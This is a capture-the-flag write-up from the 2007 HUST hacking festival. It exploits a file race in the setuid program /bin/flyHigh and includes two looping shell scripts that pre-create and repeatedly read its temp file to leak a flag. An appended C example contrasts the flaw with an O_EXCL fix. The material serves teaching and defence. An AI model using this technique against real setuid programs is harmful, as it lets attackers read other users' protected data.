--------------------------------
6th HUST hacking festival
  race condition report

hkpco
hkpco@korea.com
wowhacker&wowcode
--------------------------------


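This is the race condition report for the HUST2007 hacking festival.

No record or log of the work was kept at the time.

First, look for programs that have the setuid bit set.

The program we need to target is /bin/flyHigh.

Running strings on this program shows routines that create a file (the open function), write to it (write), and delete it (unlink).

The file it creates is named /quest/level5/tmp/HUST, and the idea is to attempt to read it in the short time between its creation and deletion.

Here we can mount a race condition attack using the short window in which /quest/level5/tmp/HUST is created, written, and deleted.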

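Running /bin/flyHigh shows that if /quest/level5/tmp/HUST already exists, it does not create the file anew.

Exploiting this, the file stops being "someone else's file that cannot be read" and becomes "a file that can be read".

The content written to the file is presumably exactly what we are after, and we have to read it.

Because unlink() is called right after the write, we use the time between the file being written and being deleted.

The sequence looks like this.

|write()|.. short time ..|unlink()|

Run /bin/flyHigh in one terminal and repeatedly read /quest/level5/tmp/HUST in another terminal, and that should do it.

However, gcc and the cat command are not available, so a shell script and the head command are used instead.

The shell scripts written are below.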

- loop_target.sh -

#!/bin/sh

for((;;))
do
	/bin/flyHigh
done

- end -

loop_target.sh is a shell script that runs /bin/flyHigh repeatedly.

Next, let's look at what race_rush.sh does.

- race_rush.sh -

#!/bin/sh

for((;;))
do
	echo "hkpco" >> /quest/level5/tmp/HUST;head /quest/level5/tmp/HUST;head /quest/level5/tmp/HUST;usleep 10000
done

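- end -

It writes the string "hkpco" to /quest/level5/tmp/HUST and reads /quest/level5/tmp/HUST with the head command.

To allow for the time /bin/flyHigh takes, head is run twice.

Because this runs in an endless loop, the output can be hard to spot even when it is printed on the terminal.

So usleep is used to slow down the repeated work.

chmod cannot be used there, so the scripts are run as "/bin/sh script.sh".

Now run them.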

[terminal 1]
$ sh loop_target.sh

[terminal 2]
$ sh race_rush.sh

Eventually [terminal 2] prints "PracTicE mAkeS PerFeCtsibar".
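
The weakness this report relies on is that /bin/flyHigh reuses /quest/level5/tmp/HUST when the file already exists. The C code below is an added example, not code from the original report or from flyHigh (whose source is not shown); the function names and the demo path are assumptions. It contrasts the assumed open() pattern with an atomic O_CREAT|O_EXCL create that refuses a pre-created file.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write the whole secret, close fd; 0 on success, -1 otherwise. */
static int put(int fd, const char *secret)
{
    ssize_t n = write(fd, secret, strlen(secret));
    close(fd);
    return n == (ssize_t)strlen(secret) ? 0 : -1;
}

/* Assumed shape of the flaw (flyHigh's source is not on the page): O_CREAT
 * without O_EXCL reuses an existing file, whoever created and owns it. */
int write_secret_weak(const char *path, const char *secret)
{
    int fd = open(path, O_WRONLY | O_CREAT, 0600);
    return fd < 0 ? -1 : put(fd, secret);
}

/* Hardened: O_CREAT|O_EXCL creates the file atomically or fails with EEXIST
 * (also when path is a symlink), so the writer always owns the file. */
int write_secret_safe(const char *path, const char *secret)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;                      /* EEXIST or other error: refuse */
    /* Confirm ownership and that group/other have no access bits. */
    if (fstat(fd, &st) != 0 || st.st_uid != geteuid() || (st.st_mode & 077)) {
        close(fd);
        unlink(path);
        return -1;
    }
    return put(fd, secret);
}

int main(void)
{
    const char *p = "/tmp/hust_demo_secret";  /* constructed demo path */
    close(open(p, O_WRONLY | O_CREAT | O_TRUNC, 0666)); /* someone else got there first */
    printf("pre-created: weak=%d\n", write_secret_weak(p, "x"));
    printf("pre-created: safe=%d\n", write_secret_safe(p, "x"));
    unlink(p);
    printf("fresh path:  safe=%d\n", write_secret_safe(p, "x"));
    return unlink(p);
}
```

Keeping such a file in a directory that other users cannot write to also removes the ability to pre-create it at all.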